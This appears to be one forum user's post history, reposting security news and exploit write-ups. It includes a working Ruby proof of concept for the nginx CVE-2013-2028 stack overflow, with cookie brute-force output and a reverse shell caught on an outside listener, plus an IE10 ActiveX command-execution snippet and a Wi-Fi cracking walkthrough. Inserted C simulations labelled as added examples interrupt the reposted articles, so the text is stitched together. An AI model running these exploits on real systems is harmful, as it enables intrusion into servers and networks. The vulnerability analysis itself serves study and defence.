Nytro

Administrators
Everything posted by Nytro

  1. Tested, works on IE10:

         <script>function run(f){var x=new ActiveXObject("WScript.Shell");x.run(f,0);}run('%comspec% /c calc')</script>

     Via @brutelogic
  2. Researcher Unlocks Samsung Galaxy S4 Bootloader for AT&T, Verizon Android Phones
     by Michael Mimoso

     Those of you who like to tinker and jailbreak Android phones should take notice of some new research conducted on Samsung Galaxy S4 Android devices shipped by AT&T and Verizon. Both device makers ship the Galaxy S4 smartphones with a locked-down bootloader that prevents users from uploading custom kernels or from making modifications to software on the phone.

     Azimuth Security researcher Dan Rosenberg has found a vulnerability in the manner in which the devices do cryptographic checks of boot image signatures and was able to exploit the flaw and upload his own unsigned kernel to the device. An attacker could do the same and upload a malicious kernel or software and own the device.

     Rosenberg has previously published work on Android devices built by Motorola where he was able to exploit a hole in the TrustZones deployed in the devices' ARM processor. TrustZones are security extensions to the processor that essentially run a secure kernel alongside the main kernel where sensitive applications such as mobile payment apps may execute. Motorola was using TrustZones to also control a lockdown of the bootloader.

     The AT&T and Verizon devices are built on the Qualcomm APQ8064T chip which relies on its QFuses technology to implement a trusted boot sequence, Rosenberg said. The technology, which is a one-time configuration of hashes and keys, cryptographically verifies the next stage of boot-up before it's launched, and then Samsung's application secondary bootloader (APPSL) runs.

     "This bootloader differs between locked and unlocked variants of the Galaxy S4 in its enforcement of signature checks on the boot and recovery partitions," Rosenberg said.

     Rosenberg discovered that the aboot bootloader on the devices is nearly identical to the open source Little Kernel bootloader project, which he said aided him in finding the functions that implement signature verification and booting of the Linux kernel. Once a particular boot function determines whether it is to load the main kernel or a recovery subsystem, it loads the appropriate partition into memory from the eMMC flash storage on the phone, Rosenberg said. That programming logic is flawed, Rosenberg said.

     "Because the boot image header is read straight from eMMC flash prior to any signature validation, it contains essentially untrusted data," Rosenberg said. "As a result, it's possible to flash a maliciously crafted boot image whose header values cause aboot to read the kernel or ramdisk into physical memory directly on top of aboot itself."

     Signature checks are done after the kernel image is loaded, but if an attacker is able to access the process before this step, he can beat the signature validation. Aboot, for example, uses an open source implementation of RSA encryption for signature validation which compares the decrypted signature of the boot image to the SHA1 hash of the boot image, Rosenberg said.

     Rosenberg said his exploit was a boot image where the ramdisk load address was equal to the address of the signature verification function in aboot. Rosenberg replaced the ramdisk with shellcode and flashed this image instead. Aboot reads the exploit image from flash and overwrites the signature check function with the shellcode.

     "The shellcode simply patches up the boot image header to contain sane values, copies the actual kernel and ramdisk into appropriate locations in memory, and returns zero, indicating the signature verification succeeded," Rosenberg said.

     More info: http://blog.azimuthsecurity.com/2013/05/exploiting-samsung-galaxy-s4-secure-boot.html

     Source: Samsung Galaxy S4 Android Bootloader Unlocked | Threatpost
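The loader ordering Rosenberg describes (header addresses trusted and used for the copy, signature checked only afterwards) reduced to a runnable simulation. This is an added example written for this page; it is not Rosenberg's exploit and not aboot or Little Kernel code. The memory map, the addresses, the "VERIFY" marker standing in for the verification routine and the 24-byte image are all constructed for the demo and say nothing about the real APQ8064T layout. The hardened loader shows the check that closes the hole: every destination range is validated against a fixed load window, in 64-bit arithmetic so that addr+size cannot wrap, before a single byte is copied.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated physical memory layout (constructed; not the real device map).
 * aboot, including its signature-check routine, lives above the window in
 * which a boot image may legitimately be placed. */
#define PHYS_SIZE        0x10000u
#define LOAD_WINDOW_BASE 0x1000u   /* kernel/ramdisk may be loaded in [BASE, END) */
#define LOAD_WINDOW_END  0x8000u
#define ABOOT_BASE       0x8000u
#define VERIFY_FN        0x8400u   /* stand-in for aboot's signature verification code */

static uint8_t phys[PHYS_SIZE];

/* The boot image header fields that matter here. aboot reads these straight
 * from eMMC before any signature check, so they are attacker-controlled. */
struct boot_hdr {
    uint32_t kernel_size, kernel_addr;
    uint32_t ramdisk_size, ramdisk_addr;
};

/* Plant a marker at VERIFY_FN so a clobber of "aboot code" is observable. */
static void reset_phys(void) {
    memset(phys, 0, sizeof phys);
    memcpy(phys + VERIFY_FN, "VERIFY", 6);
}

static int verify_fn_intact(void) {
    return memcmp(phys + VERIFY_FN, "VERIFY", 6) == 0;
}

/* Vulnerable ordering: copy kernel and ramdisk to wherever the header says,
 * then (later) verify the signature. The only bound is the simulation's
 * array size, so the demo cannot fault; the real loader checked nothing. */
static int load_vulnerable(const struct boot_hdr *h, const uint8_t *img) {
    if ((uint64_t)h->kernel_addr + h->kernel_size > PHYS_SIZE ||
        (uint64_t)h->ramdisk_addr + h->ramdisk_size > PHYS_SIZE)
        return -1;                                /* simulation guard only */
    memcpy(phys + h->kernel_addr,  img,                  h->kernel_size);
    memcpy(phys + h->ramdisk_addr, img + h->kernel_size, h->ramdisk_size);
    return 0;   /* the signature check would now run code at VERIFY_FN */
}

/* The check that closes the hole: a destination is acceptable only if the
 * whole [addr, addr+size) range sits inside the load window. Widening to
 * 64 bits first means addr+size cannot wrap back below the window. */
int dest_range_ok(uint32_t addr, uint32_t size) {
    uint64_t end = (uint64_t)addr + size;
    return size != 0 && addr >= LOAD_WINDOW_BASE && end <= LOAD_WINDOW_END;
}

static int load_hardened(const struct boot_hdr *h, const uint8_t *img) {
    if (!dest_range_ok(h->kernel_addr, h->kernel_size) ||
        !dest_range_ok(h->ramdisk_addr, h->ramdisk_size))
        return -1;                                /* reject before any copy */
    memcpy(phys + h->kernel_addr,  img,                  h->kernel_size);
    memcpy(phys + h->ramdisk_addr, img + h->kernel_size, h->ramdisk_size);
    return 0;
}

/* Constructed image: 16 bytes of "kernel" followed by an 8-byte "ramdisk". */
static void build_image(uint8_t img[24]) {
    memset(img, 'K', 16);
    memcpy(img + 16, "SHELLCOD", 8);
}

/* Malicious header: ramdisk_addr aimed at the verification routine. */
static const struct boot_hdr evil_hdr   = { 16, 0x1000, 8, VERIFY_FN };
/* Benign header: both pieces inside the load window. */
static const struct boot_hdr benign_hdr = { 16, 0x1000, 8, 0x2000 };

/* Returns 1 if the "signature check" code survived the load. */
int run_vulnerable(void) {
    uint8_t img[24]; build_image(img); reset_phys();
    load_vulnerable(&evil_hdr, img);
    return verify_fn_intact();            /* 0: overwritten with "SHELLCOD" */
}

/* Returns 1 if the hardened loader accepted the image and aboot is intact. */
int run_hardened(const struct boot_hdr *h) {
    uint8_t img[24]; build_image(img); reset_phys();
    int rc = load_hardened(h, img);
    return rc == 0 && verify_fn_intact();  /* evil: rejected; benign: loads fine */
}

int main(void) {
    printf("vulnerable loader, evil image:  verify fn intact = %d\n", run_vulnerable());
    printf("hardened loader,   evil image:  accepted = %d\n", run_hardened(&evil_hdr));
    printf("hardened loader, benign image:  accepted = %d\n", run_hardened(&benign_hdr));
    return 0;
}
```

The range check is the whole fix: once the destination cannot overlap the bootloader, the signature verification that runs afterwards is executing code the image could not have touched. A real loader would additionally cap sizes against the partition it read from and check that kernel and ramdisk ranges do not overlap each other.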
  3. Changes to our SSL Certificates
     Thursday, May 23, 2013 8:00 AM
     Posted by Stephen McHenry, Director of Information Security Engineering

     Protecting the security and privacy of our users is one of our most important tasks at Google, which is why we utilize encryption on almost all connections made to Google. This encryption needs to be updated at times to make it even stronger, so this year our SSL services will undergo a series of certificate upgrades; specifically, all of our SSL certificates will be upgraded to 2048-bit keys by the end of 2013. We will begin switching to the new 2048-bit certificates on August 1st, to ensure adequate time for a careful rollout before the end of the year. We're also going to change the root certificate that signs all of our SSL certificates because it has a 1024-bit key.

     Most client software won't have any problems with either of these changes, but we know that some configurations will require some extra steps to avoid complications. This is more often true of client software embedded in devices such as certain types of phones, printers, set-top boxes, gaming consoles, and cameras.

     For a smooth upgrade, client software that makes SSL connections to Google (e.g. HTTPS) must:

       - Perform normal validation of the certificate chain;
       - Include a properly extensive set of root certificates. We have an example set which should be sufficient for connecting to Google in our FAQ. (Note: the contents of this list may change over time, so clients should have a way to update themselves as changes occur);
       - Support Subject Alternative Names (SANs).

     Also, clients should support the Server Name Indication (SNI) extension because clients may need to make an extra API call to set the hostname on an SSL connection. Any client unsure about SNI support can be tested against https://googlemail.com; this URL should only validate if you are sending SNI.

     On the flip side, here are some examples of improper validation practices that could very well lead to the inability of client software to connect to Google using SSL after the upgrade:

       - Matching the leaf certificate exactly (e.g. by hashing it)
       - Matching any other certificate (e.g. Root or Intermediate signing certificate) exactly
       - Hard-coding the expected Root certificate, especially in firmware. This is sometimes done based on assumptions like the following:
           - The Root Certificate of our chain will not change on short notice.
           - Google will always use Thawte as its Root CA.
           - Google will always use Equifax as its Root CA.
           - Google will always use one of a small number of Root CAs.
           - The certificate will always contain exactly the expected hostname in the Common Name field and therefore clients do not need to worry about SANs.
           - The certificate will always contain exactly the expected hostname in a SAN and therefore clients don't need to worry about wildcards.

     Any software that contains these improper validation practices should be changed. More detailed information can be found in this document, and you can also check out our FAQ if you have specific questions.

     Source: Google Online Security Blog: Changes to our SSL Certificates
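The two hostname rules the post asks for (use the SAN list, and treat wildcards correctly) are where embedded clients most often go wrong, so here is the matching logic spelled out as an added example. This is not Google's code and not from the post; it is a self-contained matcher written for this page that follows the usual RFC 6125 reading of wildcards. The `cert_names` struct and the `google_like` / `legacy_cn_only` values are constructed stand-ins for what a client would have after validating the chain, not real certificate contents.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

static int count_labels(const char *s) {
    int n = 1;
    for (; *s; s++) if (*s == '.') n++;
    return n;
}

/* Case-insensitive equality of two NUL-terminated strings. */
static int ieq(const char *a, const char *b) {
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b)) return 0;
    return *a == '\0' && *b == '\0';
}

/* Does one dNSName entry (or a CN) match the requested host?
 * A wildcard is accepted only as the entire leftmost label, only when at
 * least two labels follow it (so "*.com" never matches anything), and it
 * matches exactly one label: "*.google.com" covers "mail.google.com" but not
 * "a.b.google.com" and not the bare "google.com". */
int dns_name_matches(const char *pattern, const char *host) {
    if (strncmp(pattern, "*.", 2) != 0)
        return ieq(pattern, host);                      /* no wildcard: exact match */
    if (strchr(pattern + 2, '*') != NULL || count_labels(pattern) < 3)
        return 0;                                       /* "*.com", "*.*.x" etc. */
    const char *dot = strchr(host, '.');
    if (dot == NULL || dot == host)
        return 0;                                       /* host needs a non-empty first label */
    return ieq(pattern + 2, dot + 1);                   /* remaining labels must match exactly */
}

/* What a client knows about the leaf after chain validation. */
struct cert_names {
    const char *const *sans;   /* dNSName entries; may be empty */
    size_t nsans;
    const char *cn;            /* subject Common Name; may be NULL */
};

/* SANs take precedence. The CN is consulted only for legacy certificates
 * that carry no dNSName at all; when SANs exist and none match, the CN is
 * NOT a fallback. */
int cert_matches_host(const struct cert_names *c, const char *host) {
    if (c->nsans > 0) {
        for (size_t i = 0; i < c->nsans; i++)
            if (dns_name_matches(c->sans[i], host)) return 1;
        return 0;
    }
    return c->cn != NULL && dns_name_matches(c->cn, host);
}

/* Constructed samples (not real certificate data). */
static const char *const google_like_sans[] = { "*.google.com", "*.googlemail.com", "google.com" };
const struct cert_names google_like    = { google_like_sans, 3, "*.google.com" };
const struct cert_names legacy_cn_only = { NULL, 0, "www.example.com" };

int main(void) {
    const char *hosts[] = { "mail.google.com", "a.b.google.com", "google.com",
                            "www.googlemail.com", "googlemail.com" };
    for (size_t i = 0; i < sizeof hosts / sizeof hosts[0]; i++)
        printf("%-20s -> %s\n", hosts[i], cert_matches_host(&google_like, hosts[i]) ? "match" : "no match");
    return 0;
}
```

The "googlemail.com" case is the one to note: a wildcard never covers its parent name, so a certificate must list the bare domain explicitly (as the constructed list does for google.com). Public-suffix rules (a wildcard such as "*.co.uk") and IDNA normalisation are outside what this matcher does; a production client gets both from its TLS library rather than from code like this.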
  4. Easily Assessing Wireless Networks with Kali Linux
     Posted by Brent Mills in Information Security on May 22, 2013 10:05:02 AM

     NOTE: The information contained in this tutorial is directed toward the Kali Linux distribution, but can also apply to other Linux varieties if the appropriate tools are installed. All tools used in this tutorial are freely available. For the purposes of this article, all ESSIDs and BSSIDs have been pixelated. When you run actual scans, you will be able to see these values.

     SETTING YOUR WIRELESS CARD TO MONITOR MODE

     Before using any wifi pen testing tool, you will need to set your wireless interface to Monitor mode. First, find out which wireless interfaces are available by running iwconfig from the command line.

     The response to this command tells you a few things. We know that the wireless interface on this system is wlan0 (be wary, as this may not be wlan0 after a reboot; some systems shuffle the interface name on reboot), we know that wlan0 is not associated with an access point (not connected to a wireless network), and we know that the Tx-Power (transmit power) of this interface is 15dBm. Depending on your drivers, you can bump this setting as high as 30dBm, though most systems are now limited to 20dBm to conserve power and avoid over-heating your wireless card. To adjust your transmit power, run the following:

         # iwconfig wlan0 txpower 30

     In order to set an interface to Monitor Mode (using the example of wlan0), you should run:

         airmon-ng start wlan0

     Airmon-ng (part of the Aircrack suite) has now created a new interface called mon0, which is a sub-interface of wlan0 and is set to Monitor Mode. You can now use the following command to view the wireless traffic in your area:

         airodump-ng mon0

     THIS IS NOT AN ATTACK OF ANY KIND - IT SIMPLY LISTENS TO PASSING TRAFFIC IN YOUR AREA. FEEL FREE TO TRY IT OUT.

     While using airodump-ng, the BSSID field shows the MAC addresses of nearby wireless networks. ESSID shows the names (SSIDs) of these networks. PWR shows the power of each network, which helps to determine its location and your likelihood of cracking the wifi password (the greater the power, the better your chances. NOTE: Power is never negative, but is shown that way in airodump-ng depending upon the version of the rtl8187 module that is installed. This can be fixed by accessing the terminal and running airdriver-ng unload 36, then running airdriver-ng load 35.) CH shows the channel on which a given network is broadcasting. ENC shows the encryption standard employed by each network. WEP networks are the easiest to crack, followed by WPA, and then WPA2. CIPHER and AUTH both provide further information as to how the network is secured.

     In the lower section of the terminal, you will notice that each BSSID entry is associated with a STATION. The STATION is a device which is reaching out for a network. PROBE indicates the network that the STATION is trying to reach. More often than not, you'll see a response of (not associated), meaning that the desired network isn't available, the device didn't connect, etc. If you see a real MAC address in the BSSID field, then the STATION has just connected to that network.

     Now it's time to actually do something with all this traffic!

     USING FERN-WIFI-CRACKER TO PEN TEST WIRELESS NETWORKS

     Fern-Wifi-Cracker is a free, GUI-based tool that uses the aircrack suite to attack wireless networks. Fern can be launched from the Kali Linux application menu under Wireless Attacks >> Wireless Tools >> fern-wifi-cracker. The Fern interface is pretty intuitive and will allow you to point and click your way through a wireless assessment (to an extent). In order to search for available networks, simply choose an interface from the dropdown Interface list and click the button to Scan for Access Points. After a few seconds, you'll see networks begin showing up next to both the WEP button and the WPA button. Click either the WEP or WPA button to choose a target. As the names suggest, each button is related to an encryption standard and will list the available wireless access points using that particular encryption standard. Now choose your target network from the list, click the Attack button, and wait...

     NOTE: If you choose to update Fern, it will stop working. This is because the updater is broken. Don't worry though; it's an easy fix. From the command line, run the following:

         chmod +x /usr/share/fern-wifi-cracker/resources/execute.py

     As soon as you run this command, Fern will begin operating normally again.

     USING WIFITE TO PEN TEST A WIRELESS NETWORK

     If you are comfortable using the command line, a somewhat more powerful tool available to you is Wifite. You can call wifite directly from the command line by running wifite. Wifite will begin scanning for local networks and start gathering data on devices which connect to these networks. Once you are satisfied that you have gathered enough data (I recommend waiting about 3-5 minutes), hit CTRL + C to stop scanning and select a target. Enter the number of your target network and hit ENTER to begin an attack against that network. You want to target networks that are marked with client or clients; these networks are actively communicating with a wireless device, making them even more vulnerable. Wifite automatically iterates through multiple attack types supported by Aircrack-ng in order to give you the best chances of success.

     Further Information on Aircrack-ng: For more information / tutorials around Aircrack-ng, visit the main Aircrack-ng site.

     Source: https://community.rapid7.com/community/infosec/blog/2013/05/22/easily-assessing-wireless-networks-with-kali-linux
  5. Analysis of nginx 1.3.9/1.4.0 stack buffer overflow and x64 exploitation (CVE-2013-2028)
     May 21, 2013 by w00d

     A few days after the release of the nginx advisory (CVE-2013-2028), we managed to successfully exploit the vulnerability with full control over the program flow. However, in order to make it more reliable and useful in a real-world environment, we also explored several program paths and found some other attack vectors. Since the exploit for nginx 32-bit is available in Metasploit now, we decided to publish some of our work here. In this post, you will find a quick analysis of the vulnerability and an exploit for a 64-bit Linux server using the stack-based overflow attack vector.

     The Bug

     Based on the patch on nginx.org, there is a code path that leads to a stack-based overflow vulnerability, related to 3 different nginx components.

     1) The calculation of the "chunked size" when someone sends an HTTP request with the header "Transfer-Encoding: chunked". It is calculated at src/http/ngx_http_parse.c:2011:

         if (ch >= '0' && ch <= '9') {
             ctx->size = ctx->size * 16 + (ch - '0');
             break;
         }

         c = (u_char) (ch | 0x20);

         if (c >= 'a' && c <= 'f') {
             ctx->size = ctx->size * 16 + (c - 'a' + 10);
             break;
         }

     It simply parses the chunk size input as hex and converts it to base 10. And since ctx->size is defined as size_t, an unsigned type, the value of the variable can be misinterpreted as a negative number when cast to a signed type, as we will see later.

     2) The nginx module for serving static files: when nginx is set up to serve static files (which is the default setting), ngx_http_static_handler in src/http/modules/ngx_http_static_module.c:49 will be executed when receiving a request. ngx_http_static_handler will then call ngx_http_discard_request_body at src/http/modules/ngx_http_static_module.c:211. ngx_http_discard_request_body will then call ngx_http_read_discarded_request_body at src/http/ngx_http_request_body.c:526.

     In summary, the code path is: ngx_http_static_handler -> ngx_http_discard_request_body -> ngx_http_read_discarded_request_body

     ngx_http_read_discarded_request_body is where it gets interesting; we can see a buffer with fixed size defined at src/http/ngx_http_request_body.c:630 as follows:

         static ngx_int_t
         ngx_http_read_discarded_request_body(ngx_http_request_t *r)
         {
             size_t     size;
             ssize_t    n;
             ngx_int_t  rc;
             ngx_buf_t  b;
             u_char     buffer[NGX_HTTP_DISCARD_BUFFER_SIZE];

     NGX_HTTP_DISCARD_BUFFER_SIZE is defined as 4096 in src/http/ngx_http_request.h:19.

     The interesting part is how this buffer is filled at src/http/ngx_http_request_body.c:649, which we shall use later in (3):

         size = (size_t) ngx_min(r->headers_in.content_length_n,
                                 NGX_HTTP_DISCARD_BUFFER_SIZE);

         n = r->connection->recv(r->connection, buffer, size);

     3) The state transition when parsing the HTTP request. Coming back to src/http/ngx_http_request_body.c: before calling ngx_http_read_discarded_request_body, nginx checks whether we have a "chunked" type of request; it will then run ngx_http_discard_request_body_filter, defined in src/http/ngx_http_request_body.c:680. ngx_http_discard_request_body_filter will execute ngx_http_parse_chunked, which is the code we mentioned in (1). After that, the return value "rc" is checked against some constants to decide the next move. One of them is particularly interesting:

         if (rc == NGX_AGAIN) {

             /* set amount of data we want to see next time */

             r->headers_in.content_length_n = rb->chunked->length;
             break;
         }

     Suppose we can set rb->chunked->length to a very large number at (1), and then set rc = NGX_AGAIN at (3); the following events will happen:

       - r->headers_in.content_length_n is set to a negative value (as it is defined with off_t, which is a signed integer type).
       - The function ngx_http_discard_request_body_filter returns and the program moves on to execute ngx_http_read_discarded_request_body, which contains our vulnerable buffer.
       - Finally, the recv() call is tricked into receiving more than 4096 bytes and overflows the buffer on the stack.

     There are many ways to set chunked->length, since rb->chunked->length is assigned at the end of the ngx_http_parse_chunked function based on rb->chunked->size, which we directly control:

         switch (state) {

         case sw_chunk_start:
             ctx->length = 3 /* "0" LF LF */;
             break;
         case sw_chunk_size:
             ctx->length = 2 /* LF LF */
                           + (ctx->size ? ctx->size + 4 /* LF "0" LF LF */ : 0);

     To make rc = NGX_AGAIN, we realized that for a request nginx makes the first recv with 1024 bytes, so if we send more than 1024 bytes ngx_http_parse_chunked will return NGX_AGAIN; then, when nginx tries to recv again, it will walk right into our setup.

     The payload to overflow the stack buffer is as follows:

       - Send an HTTP request with "transfer-encoding: chunked"
       - Send a large hexadecimal number to fill the entire 1024 bytes of the first read
       - Send > 4096 bytes to overflow the buffer when it tries to recv the second time

     TL;DR? Here is the proof of concept for x64:

         require 'ronin'

         tcp_connect(ARGV[0], ARGV[1].to_i) { |s|
           payload = ["GET / HTTP/1.1\r\n",
                      "Host: 1337.vnsecurity.net\r\n",
                      "Accept: */*\r\n",
                      "Transfer-Encoding: chunked\r\n\r\n"].join
           payload << "f" * (1024 - payload.length - 8) + "0f0f0f0f"  # chunked size, fills the first 1024-byte read
           payload << "A" * (4096 + 8)                                 # padding: buffer plus saved frame
           payload << "C" * 8                                          # cookie
           s.send(payload, 0)
         }

     strace output at the other end:

         strace -p 11337 -s 5000 2>&1 | grep recv
         recvfrom(3, "GET / HTTP/1.1\r\nHost: 1337.vnsecurity.net\r\nAccept: */*\r\nTransfer-Encoding: chunked\r\n\r\nfff...snip..fff0f0f0f0f", 1024, 0, NULL, NULL) = 1024
         recvfrom(3, "AAA..snip..AACCCCCCCC", 18446744069667229461, 0, NULL, NULL) = 4112

     Exploitation on x64

     The problem of the stack cookie/canary can be overcome easily by brute-forcing byte by byte. If we send an extra byte and a worker process crashes, it will return nothing, thus we know our cookie value is wrong; we try another value until we receive some output.

     Then we need to bypass ASLR and DEP. The exploitation for 32-bit in the Metasploit module won't work, since it brute-forces the libc address and that is not feasible given the large address space on x64. We give an exploit that relies only on the binary, i.e. we build the ROP gadgets from the binary. The mprotect address is computed from the mmap64 address (in the GOT table) and then used to allocate a writable-executable memory chunk. Then we use some ROP gadgets to copy our shellcode and finally have it executed by returning to it.

     TL;DR: the full exploit code can be found here.

         ruby exp-nginx.rb 1.2.3.4 4321
         [+] searching for byte: 1
         214
         [+] searching for byte: 2
         102
         [+] searching for byte: 3
         232
         [+] searching for byte: 4
         213
         [+] searching for byte: 5
         103
         [+] searching for byte: 6
         151
         [+] searching for byte: 7
         45
         Found cookie: \x00\xd6\x66\xe8\xd5\x67\x97\x2d 8
         PRESS ENTER TO GIVE THE SHIT TO THE HOLE AT w.w.w.w 4000
         1120 connections

     At w.w.w.w:

         nc -lvvv 4000
         Connection from 1.2.3.4 port 4000 [tcp/*] accepted
         uname -a
         Linux ip-10-80-253-191 3.2.0-40-virtual #64-Ubuntu SMP Mon Mar 25 21:42:18 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
         id
         uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),110(netdev),111(admin)
         ps aux | grep nginx
         ubuntu    2920  0.1  0.0  13920   668 ?   Ss   15:11   0:01 nginx: master process ./sbin/nginx
         ubuntu    5037  0.0  0.0  14316  1024 ?   S    15:20   0:00 nginx: worker process
         ubuntu    5039  0.0  0.0  14316  1024 ?   S    15:20   0:00 nginx: worker process
         ubuntu    5041  0.0  0.0  14316  1024 ?   S    15:20   0:00 nginx: worker process

     Reliable exploitation

     There are some reasons that the above exploitation/technique may not work in practice:

     1) Nginx uses non-blocking recv(). If we can't send enough data to overwrite the return address/cookie, the exploit will fail. This is mostly the case, since a normal server will be loaded with requests from different users.

     2) Our analysis here is for the default setting of nginx; the code path can be very different with another setting, thus making the exploit somewhat useless.

     3) A blind attack is difficult without knowledge of the binary / OS on the remote server. For a 32-bit OS, one may further brute-force the "write" address in the code space in order to leak information, but it will still fail for PIE.

     Trying to make this more practical in real-world environments, we actually found another attack vector which is more reliable and worked on several nginx settings. However, we will keep it for another post.

     Source: Analysis of nginx 1.3.9/1.4.0 stack buffer overflow and x64 exploitation (CVE-2013-2028) : VNSECURITY / CLGT TEAM
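The integer path behind the bug, reduced to its arithmetic so it can be stepped through offline. This is an added example written for this page, not nginx source and not the VNSECURITY exploit: `vuln_parse_chunk_size` keeps the three properties the post describes (unsigned size_t accumulation, `length = 2 + size + 4`, assignment into a signed off_t), `discard_recv_size` is the `ngx_min` line from `ngx_http_read_discarded_request_body`, and `fixed_parse_chunk_size` has the shape of the 1.4.1 fix (a signed size and a rejection of any negative size or length) plus an explicit per-digit overflow guard. CR/LF handling and the parser's state machine are left out; `MAX_OFF_T` assumes a 64-bit off_t as on x86_64 Linux; the chunk-size line is constructed in the PoC's shape.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/types.h>

#define DISCARD_BUFFER_SIZE 4096       /* NGX_HTTP_DISCARD_BUFFER_SIZE */
#define NGX_AGAIN  (-2)
#define NGX_ERROR  (-1)
#define MAX_OFF_T  INT64_MAX           /* assumption: 64-bit off_t, as on x86_64 Linux */

static int hexval(int ch) {
    if (ch >= '0' && ch <= '9') return ch - '0';
    ch |= 0x20;
    if (ch >= 'a' && ch <= 'f') return ch - 'a' + 10;
    return -1;
}

/* Vulnerable shape: the size accumulates in an unsigned size_t with no
 * overflow check, and the derived length is stored into a signed off_t.
 * buf is the part of the size line that arrived in the first recv(); an
 * unterminated line yields NGX_AGAIN, the branch the exploit relies on. */
long vuln_parse_chunk_size(const char *buf, size_t len, off_t *content_length_n) {
    size_t size = 0;
    for (size_t i = 0; i < len; i++) {
        int v = hexval(buf[i]);
        if (v < 0) return NGX_ERROR;
        size = size * 16 + (size_t)v;          /* wraps silently */
    }
    /* ctx->length = 2 + (ctx->size ? ctx->size + 4 : 0); content_length_n = length */
    *content_length_n = (off_t)(2 + (size ? size + 4 : 0));
    return NGX_AGAIN;
}

/* Fixed shape: accumulate in a signed off_t, refuse a digit that would push
 * the value past the type, and reject a negative size or length before it
 * can become a recv() count. */
long fixed_parse_chunk_size(const char *buf, size_t len, off_t *content_length_n) {
    off_t size = 0;
    for (size_t i = 0; i < len; i++) {
        int v = hexval(buf[i]);
        if (v < 0) return NGX_ERROR;
        if (size > MAX_OFF_T / 16) return NGX_ERROR;     /* size * 16 would overflow */
        size = size * 16 + v;
    }
    if (size > MAX_OFF_T - 6) return NGX_ERROR;          /* size + 4 + 2 would overflow */
    off_t length = 2 + (size ? size + 4 : 0);
    if (size < 0 || length < 0) return NGX_ERROR;
    *content_length_n = length;
    return NGX_AGAIN;
}

/* ngx_http_read_discarded_request_body:
 *   size = (size_t) ngx_min(r->headers_in.content_length_n, NGX_HTTP_DISCARD_BUFFER_SIZE);
 * A negative content_length_n wins the min() and becomes a huge size_t. */
size_t discard_recv_size(off_t content_length_n) {
    off_t n = content_length_n < DISCARD_BUFFER_SIZE ? content_length_n : DISCARD_BUFFER_SIZE;
    return (size_t)n;
}

/* Constructed size line in the PoC's shape: enough 'f' digits to saturate
 * size_t, then "0f0f0f0f". */
static const char poc_size_line[] = "ffffffffffffffffffffffffffffffff0f0f0f0f";

/* The recv() count the vulnerable path hands to the 4096-byte stack buffer.
 * With 64-bit size_t and off_t this is 18446744069667229461, i.e.
 * 0xffffffff0f0f0f15, the number in the post's strace output. */
size_t vuln_demo_recv_size(void) {
    off_t cl = 0;
    vuln_parse_chunk_size(poc_size_line, sizeof poc_size_line - 1, &cl);
    return discard_recv_size(cl);
}

/* The same line through the fixed parser: rejected at the 16th 'f'. */
long fixed_demo_rc(void) {
    off_t cl = 0;
    return fixed_parse_chunk_size(poc_size_line, sizeof poc_size_line - 1, &cl);
}

/* An ordinary size line ("1a") still parses: length = 2 + 0x1a + 4 = 32. */
int fixed_benign_ok(void) {
    off_t cl = 0;
    return fixed_parse_chunk_size("1a", 2, &cl) == NGX_AGAIN && cl == 32;
}

int main(void) {
    printf("vulnerable recv size: %zu\n", vuln_demo_recv_size());
    printf("fixed parser rc: %ld (NGX_ERROR is %d)\n", fixed_demo_rc(), NGX_ERROR);
    printf("fixed parser on \"1a\": %s\n", fixed_benign_ok() ? "ok" : "broken");
    return 0;
}
```

The point worth keeping from this: the size check has to live in the parser, before the value is stored anywhere, because by the time `discard_recv_size` sees it the sign has already been laundered through `ngx_min` and the cast to `size_t` is exactly what `recv()` wants.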
  6. Debian GNU/Hurd 2013 released!

     It is with huge pleasure that the Debian GNU/Hurd team announces the release of Debian GNU/Hurd 2013. This is a snapshot of Debian "sid" at the time of the Debian "wheezy" release (May 2013), so it is mostly based on the same sources. It is not an official Debian release, but it is an official Debian GNU/Hurd port release.

     The installation ISO images can be downloaded from Debian Ports in the usual three Debian flavors: NETINST, CD, DVD. Besides the friendly Debian installer, a pre-installed disk image is also available, making it even easier to try Debian GNU/Hurd. Debian GNU/Hurd is currently available for the i386 architecture with more than 10,000 software packages available (more than 75% of the Debian archive, and more to come!).

     Please make sure to read the configuration information, the FAQ, and the translator primer to get a grasp of the great features of GNU/Hurd.

     Due to the very small number of developers, the progress of our project has not been as fast as other successful operating systems, but we believe we have reached a very decent state, even with our limited resources. We would like to thank all the people who have worked on GNU/Hurd over the past decades. There were not many people at any given time (and still not many people today, please join!), but in the end a lot of people have contributed one way or another. Thanks everybody!

     The GNU Hurd is the GNU project's replacement for the Unix kernel. It is a collection of servers that run on the Mach microkernel to implement file systems, network protocols, file access control, and other features that are implemented by the Unix kernel or similar kernels (such as Linux).

     GNU Mach is the microkernel upon which a GNU Hurd system is based. It provides an Inter Process Communication (IPC) mechanism that the Hurd uses to define interfaces for implementing, in a distributed multi-server fashion, the services a traditional operating system kernel provides.

     Source: 2013-05-debian gnu hurd 2013
  7. win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase

     I'm quite proud of this list cycle trick, here's how to turn it into an arbitrary write.

     First, we create a watchdog thread that will patch the list atomically when we're ready. This is needed because we can't exploit the bug while HeavyAllocPool is failing, because of the early exit in pprFlattenRec:

         .text:BFA122B8    call    newpathrec        ; EPATHOBJ::newpathrec(_PATHRECORD * *,ulong *,ulong)
         .text:BFA122BD    cmp     eax, 1            ; Check for failure
         .text:BFA122C0    jz      short continue
         .text:BFA122C2    xor     eax, eax          ; Exit early
         .text:BFA122C4    jmp     early_exit

     So we create a list node like this:

         PathRecord->Next  = PathRecord;
         PathRecord->Flags = 0;

     Then EPATHOBJ::bFlatten() spins forever doing nothing:

         BOOL __thiscall EPATHOBJ::bFlatten(EPATHOBJ *this)
         {
             /* ... */
             for ( ppr = ppath->pprfirst; ppr; ppr = ppr->pprnext ) {
                 if ( ppr->flags & PD_BEZIER ) {
                     ppr = EPATHOBJ::pprFlattenRec(pathobj, ppr);
                 }
             }
             /* ... */
         }

